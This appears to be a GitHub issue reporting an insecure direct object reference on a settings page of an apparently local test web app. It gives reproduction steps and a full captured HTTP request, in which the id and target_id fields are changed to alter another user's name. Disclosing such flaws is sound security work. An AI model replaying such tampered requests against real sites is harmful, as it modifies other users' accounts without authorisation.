Skip to content

IDOR on settings page #2

Open
Open
IDOR on settings page#2

Description

@jeremybuis
jeremybuis
opened on Oct 26, 2017

Steps to reproduce:

  1. Login as a normal user
  2. Update your settings
  3. Capture the request using an intercepting proxy
  4. Resend the request after updating the id and target_id and name field to another user
  5. Navigate to the other users wall and see that their name has been changed

Attack Request:

POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

regLastName=Test&regPassword=&regDOB=1995-09-01&regEmail=jbuis@softwaresecured.com&regUsername=otest&regFirstName=Olivia&target_id=486&regPasswordConfirm=

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions